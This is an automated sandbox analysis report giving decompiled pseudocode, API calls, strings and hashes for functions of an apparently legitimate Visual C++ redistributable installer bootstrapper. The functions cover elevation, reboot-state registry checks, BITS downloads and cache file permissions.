                                                                          			E0002D01A(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr* _a52, intOrPtr* _a56) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v96;
				void _v100;
				void* __edi;
				intOrPtr _t76;
				char _t77;
				intOrPtr _t85;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;
				void* _t90;

				E0003F670(_t86,  &_v100, 0, 0x2c);
				E0003F670(_t86,  &_v56, 0, 0x2c);
				_t77 = _a4;
				_v96 = _a12;
				_t85 = _a40;
				_t87 = _a32;
				_t89 = _a36;
				_v80 = _a20;
				_v76 = _a24;
				_v52 = _a8;
				_v48 = _a44;
				_v44 = _a48;
				_v40 = _a16;
				_v100 = _t77;
				_v56 = _t77;
				_v36 = _a20;
				_v32 = _a24;
				_v12 = 0;
				_v8 = 0;
				_t76 = _a28;
				_v72 = _t76;
				_v68 = _t87;
				_v64 = _t89;
				_v60 = _t85;
				_v28 = _t76;
				_v24 = _t87;
				_v20 = _t89;
				_v16 = _t85;
				_t88 = CreateThread(0, 0, E0002AB3C,  &_v100, 0, 0);
				if(_t88 != 0) {
					_t90 = E00024FB3(0, _t85, _a8, E0002C59C,  &_v56,  &_v12);
					if(_t90 >= 0) {
						E0002CCF4(0, _t88, _v12);
						 *_a52 = _v12;
						 *_a56 = _v8;
					} else {
						_push("Failed to pump messages in child process.");
						_push(_t90);
						E0005012F();
					}
					CloseHandle(_t88);
				} else {
					_t93 =  <=  ? GetLastError() : _t71 & 0x0000ffff | 0x80070000;
					_t90 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t71 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "elevation.cpp", 0x45c, _t90);
					_push("Failed to create elevated cache thread.");
					_push(_t90);
					E0005012F();
				}
				return _t90;
			}

































                                                                          0x0002d02c
                                                                          0x0002d038
                                                                          0x0002d043
                                                                          0x0002d046
                                                                          0x0002d04c
                                                                          0x0002d04f
                                                                          0x0002d052
                                                                          0x0002d055
                                                                          0x0002d05b
                                                                          0x0002d061
                                                                          0x0002d067
                                                                          0x0002d06d
                                                                          0x0002d073
                                                                          0x0002d079
                                                                          0x0002d07c
                                                                          0x0002d082
                                                                          0x0002d089
                                                                          0x0002d096
                                                                          0x0002d099
                                                                          0x0002d09c
                                                                          0x0002d0a0
                                                                          0x0002d0a3
                                                                          0x0002d0a6
                                                                          0x0002d0a9
                                                                          0x0002d0ac
                                                                          0x0002d0af
                                                                          0x0002d0b2
                                                                          0x0002d0b5
                                                                          0x0002d0be
                                                                          0x0002d0c2
                                                                          0x0002d116
                                                                          0x0002d11a
                                                                          0x0002d12f
                                                                          0x0002d13a
                                                                          0x0002d142
                                                                          0x0002d11c
                                                                          0x0002d11c
                                                                          0x0002d121
                                                                          0x0002d122
                                                                          0x0002d128
                                                                          0x0002d145
                                                                          0x0002d0c4
                                                                          0x0002d0d5
                                                                          0x0002d0df
                                                                          0x0002d0ed
                                                                          0x0002d0f2
                                                                          0x0002d0f7
                                                                          0x0002d0f8
                                                                          0x0002d0fe
                                                                          0x0002d153

                                                                          APIs
                                                                          • CreateThread.KERNEL32 ref: 0002D0B8
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0002D0C4
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0002D145
                                                                          Strings
                                                                          • elevation.cpp, xrefs: 0002D0E8
                                                                          • Failed to create elevated cache thread., xrefs: 0002D0F2
                                                                          • Failed to pump messages in child process., xrefs: 0002D11C
                                                                          • @Met, xrefs: 0002D0C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastThread
                                                                          • String ID: @Met$Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                          • API String ID: 747004058-2787839274
                                                                          • Opcode ID: a9f3e1c80eb702070fb2b2d9344b3953040e9402ba85afcc3bd3678c36c8ed28
                                                                          • Instruction ID: 1de67f96b1780a0afb7a6cddca15015a6eee26aa10d3b0f2e2b0fd42554fa4cf
                                                                          • Opcode Fuzzy Hash: a9f3e1c80eb702070fb2b2d9344b3953040e9402ba85afcc3bd3678c36c8ed28
                                                                          • Instruction Fuzzy Hash: 7941E6B5E01219AFDB05DFA9D8819EEBBF9EF48310F10412AF908E7341D774AD408BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001F69D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E0001F69D(intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				void* _t46;
				void* _t48;
				void* _t50;
				intOrPtr* _t53;
				void* _t58;
				void* _t65;
				void* _t66;

				_t61 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				if(E00011F20( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_a4 + 0x50))) >= 0) {
					if(E00050E3F( *((intOrPtr*)(_t61 + 0x4c)), _v16, 1,  &_v12) < 0) {
						_t65 = E00050E3F( *((intOrPtr*)(_t61 + 0x4c)),  *((intOrPtr*)(_t61 + 0x50)), 1,  &_v8);
						if(_t65 == 0x80070002 || _t65 == 0x80070003) {
							 *_a8 = 0;
							goto L23;
						} else {
							if(_t65 >= 0) {
								_t66 = E00050EEC(_t58, _v8, L"Resume",  &_v20);
								if(_t66 != 0x80070002) {
									if(_t66 >= 0) {
										_t46 = _v20 - 1;
										if(_t46 == 0) {
											 *_a8 = 2;
										} else {
											_t48 = _t46 - 1;
											if(_t48 == 0) {
												 *_a8 = 5;
											} else {
												_t50 = _t48 - 1;
												if(_t50 == 0) {
													 *_a8 = 6;
												} else {
													_t53 = _a8;
													if(_t50 == 1) {
														 *_t53 = 4;
													} else {
														 *_t53 = 1;
													}
												}
											}
										}
										goto L24;
									}
									_push("Failed to read Resume value.");
									goto L2;
								}
								 *_a8 = 1;
								goto L23;
							} else {
								_push("Failed to open registration key.");
								goto L2;
							}
						}
					} else {
						 *_a8 = 3;
						L23:
						_t66 = 0;
						goto L24;
					}
				} else {
					_push("Failed to format pending restart registry key to read.");
					L2:
					_push(_t66);
					E0005012F();
					L24:
					if(_v8 != 0) {
						RegCloseKey(_v8);
						_v8 = 0;
					}
					if(_v12 != 0) {
						RegCloseKey(_v12);
						_v12 = 0;
					}
					if(_v16 != 0) {
						E000554EF(_v16);
					}
					return _t66;
				}
			}














                                                                          0x0001f6a6
                                                                          0x0001f6ae
                                                                          0x0001f6b1
                                                                          0x0001f6b7
                                                                          0x0001f6c0
                                                                          0x0001f6cf
                                                                          0x0001f6f6
                                                                          0x0001f717
                                                                          0x0001f720
                                                                          0x0001f7bb
                                                                          0x00000000
                                                                          0x0001f732
                                                                          0x0001f734
                                                                          0x0001f74e
                                                                          0x0001f752
                                                                          0x0001f761
                                                                          0x0001f770
                                                                          0x0001f773
                                                                          0x0001f7b0
                                                                          0x0001f775
                                                                          0x0001f775
                                                                          0x0001f778
                                                                          0x0001f7a5
                                                                          0x0001f77a
                                                                          0x0001f77a
                                                                          0x0001f77d
                                                                          0x0001f79a
                                                                          0x0001f77f
                                                                          0x0001f782
                                                                          0x0001f785
                                                                          0x0001f78f
                                                                          0x0001f787
                                                                          0x0001f787
                                                                          0x0001f787
                                                                          0x0001f785
                                                                          0x0001f77d
                                                                          0x0001f778
                                                                          0x00000000
                                                                          0x0001f773
                                                                          0x0001f763
                                                                          0x00000000
                                                                          0x0001f763
                                                                          0x0001f757
                                                                          0x00000000
                                                                          0x0001f736
                                                                          0x0001f736
                                                                          0x00000000
                                                                          0x0001f736
                                                                          0x0001f734
                                                                          0x0001f6f8
                                                                          0x0001f6fb
                                                                          0x0001f7bd
                                                                          0x0001f7bd
                                                                          0x00000000
                                                                          0x0001f7bd
                                                                          0x0001f6d1
                                                                          0x0001f6d1
                                                                          0x0001f6d6
                                                                          0x0001f6d6
                                                                          0x0001f6d7
                                                                          0x0001f7bf
                                                                          0x0001f7c8
                                                                          0x0001f7cd
                                                                          0x0001f7cf
                                                                          0x0001f7cf
                                                                          0x0001f7d5
                                                                          0x0001f7da
                                                                          0x0001f7dc
                                                                          0x0001f7dc
                                                                          0x0001f7e2
                                                                          0x0001f7e7
                                                                          0x0001f7e7
                                                                          0x0001f7f4
                                                                          0x0001f7f4

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0001F7CD
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0001F7DA
                                                                          Strings
                                                                          • Resume, xrefs: 0001F741
                                                                          • %ls.RebootRequired, xrefs: 0001F6BA
                                                                          • Failed to open registration key., xrefs: 0001F736
                                                                          • Failed to format pending restart registry key to read., xrefs: 0001F6D1
                                                                          • Failed to read Resume value., xrefs: 0001F763
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                          • API String ID: 3535843008-3890505273
                                                                          • Opcode ID: 681c01e27192e6115e263c5c7641085dea6e0f90c8aa9e673ee72a1a7b429a4b
                                                                          • Instruction ID: 0cdad8954a3a3261bd9bc49b35c4d8daecba35f2124a6caefb254d6e9a16e3ee
                                                                          • Opcode Fuzzy Hash: 681c01e27192e6115e263c5c7641085dea6e0f90c8aa9e673ee72a1a7b429a4b
                                                                          • Instruction Fuzzy Hash: 1F41757690411AEFCB119F98C881AFDBBB5FF05310F258176F914AB291D372AE81DB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002A7FA Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E0002A7FA(void* __eflags, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				short* _v8;
				short* _v12;
				char _v16;
				char _v20;
				int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t49;
				void* _t53;

				_t44 = _a8;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(E00011C57(_t44, 0x7fffffff,  &_v20) >= 0) {
					_t53 = E00011C57(_a12, 0x7fffffff,  &_v16);
					if(_t53 >= 0) {
						_t45 = _v16;
						_t49 = _v20;
						if(_t49 < _t45 + 3) {
							L20:
							return _t53;
						}
						_t50 = _t49 - _t45;
						if(CompareStringW(0, 1, _t44 + (_t49 - _t45) * 2, 0xffffffff, _a12, 0xffffffff) != 2) {
							L16:
							if(_v12 != 0) {
								E000554EF(_v12);
							}
							if(_v8 != 0) {
								E000554EF(_v8);
							}
							goto L20;
						}
						if(E000121A5( &_v8, _t44, _t50) >= 0) {
							_t51 = L"WixBundleLastUsedSource";
							_t53 = E0001738E(_t45, _a4, L"WixBundleLastUsedSource",  &_v12);
							if(_t53 < 0) {
								if(_t53 != 0x80070490) {
									L13:
									_t53 = E000180F6(_a4, _t51, _v8, 0);
									if(_t53 >= 0) {
										goto L16;
									}
									_push("Failed to set last source.");
									L15:
									_push(_t53);
									E0005012F();
									goto L16;
								}
								_t43 = 3;
								_t53 = 0;
								L12:
								if(_t43 == 2) {
									goto L16;
								}
								goto L13;
							}
							_t43 = CompareStringW(0, 1, _v8, 0xffffffff, _v12, 0xffffffff);
							goto L12;
						}
						_push("Failed to trim source folder.");
						goto L15;
					}
					_push("Failed to determine length of relative path.");
					goto L15;
				}
				_push("Failed to determine length of source path.");
				goto L15;
			}












                                                                          0x0002a801
                                                                          0x0002a808
                                                                          0x0002a810
                                                                          0x0002a813
                                                                          0x0002a816
                                                                          0x0002a828
                                                                          0x0002a841
                                                                          0x0002a845
                                                                          0x0002a851
                                                                          0x0002a854
                                                                          0x0002a85c
                                                                          0x0002a914
                                                                          0x0002a91b
                                                                          0x0002a91b
                                                                          0x0002a867
                                                                          0x0002a87c
                                                                          0x0002a8f7
                                                                          0x0002a8fb
                                                                          0x0002a900
                                                                          0x0002a900
                                                                          0x0002a909
                                                                          0x0002a90e
                                                                          0x0002a90e
                                                                          0x00000000
                                                                          0x0002a909
                                                                          0x0002a88d
                                                                          0x0002a899
                                                                          0x0002a8a8
                                                                          0x0002a8ac
                                                                          0x0002a8ca
                                                                          0x0002a8d6
                                                                          0x0002a8e4
                                                                          0x0002a8e8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a8ea
                                                                          0x0002a8ef
                                                                          0x0002a8ef
                                                                          0x0002a8f0
                                                                          0x00000000
                                                                          0x0002a8f6
                                                                          0x0002a8ce
                                                                          0x0002a8cf
                                                                          0x0002a8d1
                                                                          0x0002a8d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a8d4
                                                                          0x0002a8bc
                                                                          0x00000000
                                                                          0x0002a8bc
                                                                          0x0002a88f
                                                                          0x00000000
                                                                          0x0002a88f
                                                                          0x0002a847
                                                                          0x00000000
                                                                          0x0002a847
                                                                          0x0002a82a
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                          • API String ID: 0-660234312
                                                                          • Opcode ID: 3539058162c234a58944b36688a966e591b4cc35855998125278dafc5fd618be
                                                                          • Instruction ID: 1952d7eb2d27a9cebf6aadb0508c0b13839e47c4c0454b8eea1add657dd40757
                                                                          • Opcode Fuzzy Hash: 3539058162c234a58944b36688a966e591b4cc35855998125278dafc5fd618be
                                                                          • Instruction Fuzzy Hash: E531E832E00639BBDF219A54DC05EEFB7B9AF05720F114266F920B61D1EF319E819791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003D677 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00070A84,00000000,00000017,00070A94,?,?,00000000,00000000,?,?,?,?,?,0003DCAE,00000000,00000000), ref: 0003D6AF
                                                                          Strings
                                                                          • WixBurn, xrefs: 0003D6DA
                                                                          • Failed to set notification flags for BITS job., xrefs: 0003D701
                                                                          • Failed to set progress timeout., xrefs: 0003D719
                                                                          • Failed to create BITS job., xrefs: 0003D6E9
                                                                          • Failed to create IBackgroundCopyManager., xrefs: 0003D6BB
                                                                          • Failed to set BITS job to foreground., xrefs: 0003D730
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                          • API String ID: 542301482-468763447
                                                                          • Opcode ID: 55cfaeca5e6276db9cc0df2986d23dfe55dfc768a1809ef6f1899a6da6c4f723
                                                                          • Instruction ID: 5236b220ee24765c38343b9456ef675973948634206fee9229e811c276a7cf60
                                                                          • Opcode Fuzzy Hash: 55cfaeca5e6276db9cc0df2986d23dfe55dfc768a1809ef6f1899a6da6c4f723
                                                                          • Instruction Fuzzy Hash: F331A431F40616EFD716CF64D856EAFBBB8EF48710F10415AE909EB350DA74AC018B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003D12C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 39%
                                                                          			E0003D12C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v24;
				char _v28;
				char _v32;
				void* _t50;
				char _t69;
				signed int _t70;
				intOrPtr _t71;
				void* _t72;

				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t71 = _a4;
				WaitForSingleObject( *(_t71 + 0xc), 0xffffffff);
				ReleaseMutex( *(_t71 + 0xc));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t69 = 2;
				_push(_a12);
				_v32 = _t69;
				_v28 = 1;
				_v24 = (( *( *((intOrPtr*)(_t71 + 0x10)) + 0x219) & 0x000000ff) + ( *( *((intOrPtr*)(_t71 + 0x10)) + 0x218) & 0x000000ff) >> 0x00000001 & 0x000000ff) * 0x64 / 0xff;
				_push( &_v32);
				if(_a8() == _t69) {
					WaitForSingleObject( *(_t71 + 0xc), 0xffffffff);
					 *((char*)( *((intOrPtr*)(_t71 + 0x10)) + 2)) = 1;
					 *((char*)( *((intOrPtr*)(_t71 + 0x10)) + 3)) = 1;
					ReleaseMutex( *(_t71 + 0xc));
					SetEvent( *(_t71 + 8));
				}
				_t50 = E0003CF56(_t71,  &_v12,  &_v8,  &_v16);
				_t70 = _v8;
				_t72 = _t50;
				if(_t72 >= 0) {
					__eflags = _v12 - 0x1070001;
					if(__eflags == 0) {
						_t72 = E0003D047(__eflags, _a4, _t70, _a8, _a12);
						__eflags = _t72;
						if(_t72 < 0) {
							_push("Failed to send files in use message from netfx chainer.");
							goto L7;
						}
					}
				} else {
					_push("Failed to get message from netfx chainer.");
					L7:
					_push(_t72);
					E0005012F();
				}
				if(_t70 != 0) {
					E00013999(_t70);
				}
				return _t72;
			}














                                                                          0x0003d132
                                                                          0x0003d136
                                                                          0x0003d13c
                                                                          0x0003d145
                                                                          0x0003d161
                                                                          0x0003d170
                                                                          0x0003d178
                                                                          0x0003d179
                                                                          0x0003d17a
                                                                          0x0003d181
                                                                          0x0003d182
                                                                          0x0003d185
                                                                          0x0003d188
                                                                          0x0003d191
                                                                          0x0003d197
                                                                          0x0003d19d
                                                                          0x0003d1a4
                                                                          0x0003d1ad
                                                                          0x0003d1b4
                                                                          0x0003d1bb
                                                                          0x0003d1c4
                                                                          0x0003d1c4
                                                                          0x0003d1d7
                                                                          0x0003d1dc
                                                                          0x0003d1df
                                                                          0x0003d1e3
                                                                          0x0003d1ec
                                                                          0x0003d1f3
                                                                          0x0003d204
                                                                          0x0003d206
                                                                          0x0003d208
                                                                          0x0003d20a
                                                                          0x00000000
                                                                          0x0003d20a
                                                                          0x0003d208
                                                                          0x0003d1e5
                                                                          0x0003d1e5
                                                                          0x0003d20f
                                                                          0x0003d20f
                                                                          0x0003d210
                                                                          0x0003d216
                                                                          0x0003d219
                                                                          0x0003d21c
                                                                          0x0003d21c
                                                                          0x0003d229

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,746AF730,00000000,?,?,?,?,0003D439,?), ref: 0003D145
                                                                          • ReleaseMutex.KERNEL32(?,?,?,?,0003D439,?), ref: 0003D161
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003D1A4
                                                                          • ReleaseMutex.KERNEL32(?), ref: 0003D1BB
                                                                          • SetEvent.KERNEL32(?), ref: 0003D1C4
                                                                          Strings
                                                                          • Failed to get message from netfx chainer., xrefs: 0003D1E5
                                                                          • Failed to send files in use message from netfx chainer., xrefs: 0003D20A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: MutexObjectReleaseSingleWait$Event
                                                                          • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                          • API String ID: 2608678126-3424578679
                                                                          • Opcode ID: 99c20843e30850209204633a6e559a00de1247e0e4f05a73d3c5d9a4e6889baa
                                                                          • Instruction ID: ebe034b0390caa287420aac88d020ae0c300aa4ee9deaa657384ad28c781c856
                                                                          • Opcode Fuzzy Hash: 99c20843e30850209204633a6e559a00de1247e0e4f05a73d3c5d9a4e6889baa
                                                                          • Instruction Fuzzy Hash: 5E31C731900709BFDB129FA4DC08EEFBBF9EF54321F108666F955A6261C735E9448B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00028BE5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E00028BE5(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				char _v8;
				struct _ACL _v16;
				void* _t12;
				signed short _t20;
				signed short _t21;
				char _t30;
				void* _t31;
				signed short _t35;

				_t12 = 0x20000004;
				_t30 = 0;
				_v16.AclRevision = 0;
				_v16.AceCount = 0;
				_v8 = 0;
				_t36 = _a4;
				if(_a4 == 0) {
					L7:
					_t31 = E000554F8( &_v16, _a8, 1, _t12, _t30, 0,  &_v16, 0, 3, 0x7d0);
					SetFileAttributesW(_a8, 0x80);
				} else {
					if(E00028003(__ecx, _t36, 0x1a,  &_v8) >= 0) {
						_t20 = InitializeAcl( &_v16, 8, 2);
						__eflags = _t20;
						if(_t20 != 0) {
							_t30 = _v8;
							_t12 = 0x20000005;
							goto L7;
						} else {
							_t21 = GetLastError();
							__eflags = _t21;
							_t35 =  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000;
							__eflags = _t35;
							_t31 =  >=  ? 0x80004005 : _t35;
							E000137D3(0x80004005, "cache.cpp", 0x601, _t31);
							_push("Failed to initialize ACL.");
							goto L3;
						}
					} else {
						_push("Failed to allocate administrator SID.");
						L3:
						_push(_t31);
						E0005012F();
						_t30 = _v8;
					}
				}
				if(_t30 != 0) {
					E00013999(_t30);
				}
				return _t31;
			}











                                                                          0x00028bee
                                                                          0x00028bf5
                                                                          0x00028bf7
                                                                          0x00028bfa
                                                                          0x00028bfd
                                                                          0x00028c00
                                                                          0x00028c03
                                                                          0x00028c77
                                                                          0x00028c98
                                                                          0x00028c9a
                                                                          0x00028c05
                                                                          0x00028c14
                                                                          0x00028c30
                                                                          0x00028c36
                                                                          0x00028c38
                                                                          0x00028c6f
                                                                          0x00028c72
                                                                          0x00000000
                                                                          0x00028c3a
                                                                          0x00028c3a
                                                                          0x00028c49
                                                                          0x00028c4b
                                                                          0x00028c53
                                                                          0x00028c55
                                                                          0x00028c63
                                                                          0x00028c68
                                                                          0x00000000
                                                                          0x00028c68
                                                                          0x00028c16
                                                                          0x00028c16
                                                                          0x00028c1b
                                                                          0x00028c1b
                                                                          0x00028c1c
                                                                          0x00028c21
                                                                          0x00028c25
                                                                          0x00028c14
                                                                          0x00028ca2
                                                                          0x00028ca5
                                                                          0x00028ca5
                                                                          0x00028cb2

                                                                          APIs
                                                                          • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 00028C30
                                                                          • GetLastError.KERNEL32(?,?,?,00000001), ref: 00028C3A
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00028C9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileInitializeLast
                                                                          • String ID: @Met$Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                          • API String ID: 669721577-176173597
                                                                          • Opcode ID: cc99026120cab5c65db5e129a083ff54351d9bfbc5d8703ea93d079670adfc2b
                                                                          • Instruction ID: acc3934f9258680b315b4cd27c3f83bbb2355948de9b7dfef8e6c2d69521aba5
                                                                          • Opcode Fuzzy Hash: cc99026120cab5c65db5e129a083ff54351d9bfbc5d8703ea93d079670adfc2b
                                                                          • Instruction Fuzzy Hash: 4A21D876A45324BBEB209E999C86F9FB7A9EB44711F118029FD04F7180EB719E0097A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001410D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E0001410D(void* __ecx, WCHAR** _a4) {
				long _v8;
				long _t6;
				void* _t12;
				WCHAR* _t18;
				long _t19;
				WCHAR** _t23;
				long _t26;

				_t18 = 0;
				_t23 = _a4;
				_t6 = 0;
				_v8 = 0;
				_t26 = 0;
				if(_t23 == 0 ||  *_t23 == 0) {
					L5:
					_t19 = GetCurrentDirectoryW(_t6, _t18);
					if(_t19 != 0) {
						if(_v8 >= _t19) {
							goto L12;
						}
						_t26 = E00011EDE(_t23, _t19);
						if(_t26 >= 0 && GetCurrentDirectoryW(_t19,  *_t23) == 0) {
							_t30 =  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
							_t12 = 0x80004005;
							_t26 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
							_push(_t26);
							_push(0x190);
							L11:
							_push("dirutil.cpp");
							E000137D3(_t12);
						}
						goto L12;
					}
					_t33 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					_t12 = 0x80004005;
